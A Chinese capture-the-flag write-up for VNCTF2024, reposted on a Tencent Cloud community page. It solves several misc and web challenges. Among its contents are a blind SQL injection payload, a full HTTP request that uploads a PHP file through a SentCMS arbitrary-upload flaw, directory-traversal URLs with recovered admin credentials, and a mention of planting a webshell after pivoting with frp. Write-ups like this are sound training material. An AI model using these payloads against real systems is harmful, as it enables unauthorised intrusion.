前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >VNCTF2024-WP

VNCTF2024-WP

作者头像
故里[TRUE]
发布2024-02-18 08:53:44
5660
发布2024-02-18 08:53:44
举报

VNCTF2024-WP

前言

没啥时间打了,简单看了一下这次VNCTF,质量还是挺高的,有的没看的题等有师傅发WP再复现看看。

MISC

sqlshark

直接找这种类型语句就行

代码语言:javascript
复制
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 4 fOr 1))))in(105))),1,0))#
代码语言:javascript
复制
97 98 109 105 110 95 111 64 115 115 119 48 114 100

VNCTF{admin_p@ssw0rd}

OnlyLocalSql

第五个写出来,刚开始没看这题,害

image.png
image.png

是西湖论剑初赛原题,只是放到内网,外网不能直接访问到,本来想着是msf搭建代理,但是不行,后边换成frp就可以了

然后访问根据泄露的数据库密码连接,发现连不上

然后灵机一动,我已经通过SSH有shell了,我直接写个马用蚁剑连,然后也巧合,题目flag只是ctf用户没权限,我写马是www-data权限,就直接读flag了

vnctf{6aec435f-9543-46b1-8f62-370abea0f615}

WEB

Checkin

VNCTF{W31c0m3_t0_VNCTF_2024_g@od_J0B!!!}

TrySent

Sentcms任意文件上传漏洞,注册登陆之后上传恶意文件即可

代码语言:javascript
复制
POST /user/upload/upload HTTP/1.1
Host: adcfa8dc-c331-4ea0-b485-9fa3fd9ad107.vnctf2024.manqiu.top
Cookie: PHPSESSID=83dc5e96502c083ca5441c535463f46c
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF
<?php phpinfo();?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

访问phpinfo得到flag

vnctf{fbf0c81b-58a6-47f0-a556-f535c17e3b24}

CutePath

目录穿越可以查看flag

代码语言:javascript
复制
http://manqiu.top:20533/#/../../..//flag/flag

找到管理员账密

代码语言:javascript
复制
admin:gdgm.edu.cn@M1n9K1n9P@as

文件可以通过重命名跨目录移动

代码语言:javascript
复制
../../../home/ming/share_main/f

VNCTF{564e406840636b3156315f6764676d}

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2024-02-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • MISC
    • sqlshark
      • OnlyLocalSql
      • WEB
        • Checkin
          • TrySent
            • CutePath
            相关产品与服务
            数据库
            云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档